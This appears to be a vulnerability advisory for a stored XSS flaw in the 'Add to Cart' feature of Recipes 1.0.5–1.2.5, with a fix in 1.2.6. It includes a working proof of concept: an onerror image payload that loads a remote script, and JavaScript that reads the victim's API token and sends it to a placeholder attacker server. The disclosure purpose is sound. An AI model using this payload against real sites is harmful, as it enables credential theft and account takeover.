Overview
In Recipes, versions 1.0.5 through 1.2.5 are vulnerable to Stored Cross-Site Scripting (XSS), in “Add to Cart” functionality. When a victim accesses the food list page, then adds a new Food with a malicious javascript payload in the ‘Name’ parameter and clicks on the Add to Shopping Cart icon, an XSS payload will trigger. A low privileged attacker will have the victim's API key and can lead to admin's account takeover.
Details
In Recipes, versions 1.0.5 through 1.2.5 are vulnerable to Stored Cross-Site Scripting (XSS), in “Add to Cart” functionality. When a victim accesses the food list page, then adds a new Food with a malicious javascript payload in the ‘Name’ parameter and clicks on the Add to Shopping Cart icon, an XSS payload will trigger. A low privileged attacker will have the victim's API key and can lead to admin's account takeover.
PoC Details
Access the application through a web browser and login as a user. Now navigate to the food list from the navigation bar. On the food list page, click on the plus '+' icon. Under the name input field, enter the XSS payload given in the "POC Code" section below and save it. Then host the JavaScript file for fetching the victim's API (the code for the JavaScript file can be found in the "POC Code" section below). In a new browser window, login as administrator and access the food list page. Now, click on the add to shopping cart icon, this will trigger the XSS payload and the attacker will receive the admin's API key in the listener on the attacker hosting port.
PoC Code
XSS payload:
<img src=a onerror="var x=document.createElement('script');x.src='<attacker_server>/api.js';document.body.appendChild(x);">
JavaScript file (api.js):
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/settings/',true);
req.send();
function handleResponse() {
t var a=this.responseText.match(/Authorization: Token.{1,}/)[0];
t a=a.split("Token ")[1];
t a=a.split("<")[0];
t console.log(a);
t var changeReq = new XMLHttpRequest();
changeReq.open('get', '<attacker_server>:<attacker_port>/api='+a, false);
changeReq.send()
Affected Environments
1.0.5 through 1.2.5
Prevention
Update version to 1.2.6 or higher